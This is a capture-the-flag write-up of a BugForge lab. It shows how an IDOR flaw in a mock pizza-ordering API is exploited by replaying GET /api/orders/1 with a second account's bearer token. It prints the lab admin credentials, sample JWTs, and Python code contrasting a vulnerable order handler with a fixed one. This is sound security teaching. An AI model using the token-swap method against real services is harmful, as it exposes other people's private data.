
BugForge Write-Up 3/22/2026

  • icanhaspii
  • Mar 22
  • 2 min read

Updated: 7 days ago

  • BugForge Daily Challenge 3/22/2026 - Cheesy Does It 

 

Hint: IDOR. Can you view things that don't belong to you? 

 


Note: 

If there is an admin account active for a lab, the credentials are admin:admin123 


  • I launched Caido.


  • I checked to see if there was an admin login using the set/known creds, and there was. I logged out of that for now.


  • The challenge hint stated this was an IDOR challenge and following along with the @PawPawHacks/Tom Fieber walkthrough, he said that with an IDOR you pretty much always need to create two accounts, so that's the first thing I did. To create two accounts, I made one user account (Tester1), and then launched a "New private window" in my browser and created a second user account (Tester2). Once logged in, I was taken to an app that appeared to behave a lot like an online pizza shop: 

 

  • Next, I had read a hint in the BugForge Discord from @PawPawHacks/Tom Fieber: "See if there's any spot where you might be able to see something that 'belongs' to another user"...so when I looked at all the drop-down menus on the website, there were: Menu, Build Pizza, Orders, Cart, and Profile. It seemed to me that out of all of those, "Orders" was the one to home in on: orders are per-user data that are fetched by a numeric ID.


  • Using the first user account I'd created (Tester1), I put together an order, placed it in my cart, and then checked it out...noting what the URL was for the order number: https://lab-1774214756286-0h2khg.labs-app.bugforge.io/orders/1



  • Next, over in my Caido proxy window, I found the traffic for the order I had just placed: "GET /api/orders/1", so I highlighted that line of traffic in the proxy, then right-clicked and selected "Send to Replay -> Default Collection": 

 

  • Now, over in the "Replay" tab, I hit the red "Send" button so that I had a baseline of what the traffic "Response" looked like:


 

  • Next, still in the "Replay" tab, in the "Request" pane, I swapped the Authorization token for my first account (Tester1) with the one from my second account (Tester2), leaving the rest of the request (GET /api/orders/1) untouched. So I changed the following from:


Tester1:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NCwidXNlcm5hbWUiOiJUZXN0ZXIxIiwiaWF0IjoxNzc0MjE1MDc4fQ.FSwdMUPvesZfHBceDjxrS5XNEoMRVjZbMVNY3_DL04g


to:


Tester2:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NSwidXNlcm5hbWUiOiJUZXN0ZXIyIiwiaWF0IjoxNzc0MjE1MTUwfQ.DAEjQX9H4RoeNesHOPZjduXrpXBP8eAqT24jCysPwhU


Or another view, the JSON responses that issued each token (the decoded JWT payloads carry the same ids: Tester1 is "id": 4, Tester2 is "id": 5):


Tester1: 



{ "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NCwidXNlcm5hbWUiOiJUZXN0ZXIxIiwiaWF0IjoxNzc0MjE1MDc4fQ.FSwdMUPvesZfHBceDjxrS5XNEoMRVjZbMVNY3_DL04g", "user": { "id": 4, "username": "Tester1", "email": "Tester1@AOL.com", "full_name": "Tester One", "phone": "2125551212", "address": "1313 Mockingbird Lane" } }

to: 


Tester2: 


 

{ "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NSwidXNlcm5hbWUiOiJUZXN0ZXIyIiwiaWF0IjoxNzc0MjE1MTUwfQ.DAEjQX9H4RoeNesHOPZjduXrpXBP8eAqT24jCysPwhU", "user": { "id": 5, "username": "Tester2", "email": "Tester2@AoL.com", "full_name": "Tester Two", "phone": "2125551212", "address": "1313 Mockingbird Lane" } }
  • Now, when I hit the red "Send" button again, I get the flag! Order 1 belongs to Tester1, but the server happily returned it to a request authenticated as Tester2: /api/orders/{id} checks that the caller is logged in, but never checks that the order belongs to the caller.

 

}], "flag": "bug{********************************}" }
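To make the check above reproducible without a lab, here is an added Python model of the two-account IDOR test, written for this write-up; it is not the lab's code and not Caido output. It implements a minimal HS256 JWT (stdlib only), a vulnerable `/api/orders/{id}` handler next to a fixed one, and an `idor_check` that replays the same request with the victim's and the attacker's token, the way Replay was used above. The signing secret, the order contents and all function names are assumptions; the user ids 4 and 5 and the Tester1/Tester2 claims match the tokens shown above.

```python
import base64
import hashlib
import hmac
import json

# Assumed server-side signing secret (hypothetical; the lab's real secret is unknown).
SECRET = b"assumed-lab-secret"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_token(claims: dict) -> str:
    """Issue a compact HS256 JWT: base64url(header).base64url(payload).base64url(sig)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_token(token: str) -> dict:
    """Return the claims if the signature is valid, else raise PermissionError."""
    header, body, sig = token.split(".")
    expected = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        raise PermissionError("bad signature")
    return json.loads(_b64url_decode(body))


def _bearer(auth_header: str) -> str:
    scheme, _, token = auth_header.partition(" ")
    if scheme != "Bearer" or not token:
        raise PermissionError("missing bearer token")
    return token


# Constructed sample data modelled on the write-up: user 4 is Tester1, user 5 is
# Tester2, and order 1 was placed by Tester1.
ORDERS = {1: {"id": 1, "user_id": 4, "items": ["large pepperoni"], "total": 18.50}}


def get_order_vulnerable(auth_header: str, order_id: int):
    """Authenticates the caller but never checks who owns the order (the IDOR)."""
    try:
        verify_token(_bearer(auth_header))
    except PermissionError as exc:
        return 401, {"error": str(exc)}
    order = ORDERS.get(order_id)
    if order is None:
        return 404, {"error": "not found"}
    return 200, order


def get_order_fixed(auth_header: str, order_id: int):
    """Same lookup, but the owner must match the id claim of the verified token."""
    try:
        caller = verify_token(_bearer(auth_header))
    except PermissionError as exc:
        return 401, {"error": str(exc)}
    order = ORDERS.get(order_id)
    # 404 for both "missing" and "not yours", so ids cannot be enumerated.
    if order is None or order["user_id"] != caller["id"]:
        return 404, {"error": "not found"}
    return 200, order


def idor_check(handler, victim_token: str, attacker_token: str, order_id: int) -> dict:
    """Replay one request with two identities; IDOR if both get the same 200 body."""
    baseline_status, baseline = handler(f"Bearer {victim_token}", order_id)
    cross_status, cross = handler(f"Bearer {attacker_token}", order_id)
    return {
        "baseline": baseline_status,
        "cross_account": cross_status,
        "idor": baseline_status == 200 and cross_status == 200 and cross == baseline,
    }


if __name__ == "__main__":
    tester1 = sign_token({"id": 4, "username": "Tester1", "iat": 1774215078})
    tester2 = sign_token({"id": 5, "username": "Tester2", "iat": 1774215150})
    print("vulnerable:", idor_check(get_order_vulnerable, tester1, tester2, 1))
    print("fixed:     ", idor_check(get_order_fixed, tester1, tester2, 1))
```

Note the fix is an ownership check on the server, not anything about the token: simply editing the `"id"` claim inside a JWT does not work, because the signature no longer verifies. The test that produced the flag swapped in a second, validly signed token, which is exactly why the two-account setup is needed.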

 

##### End of Report ##### 
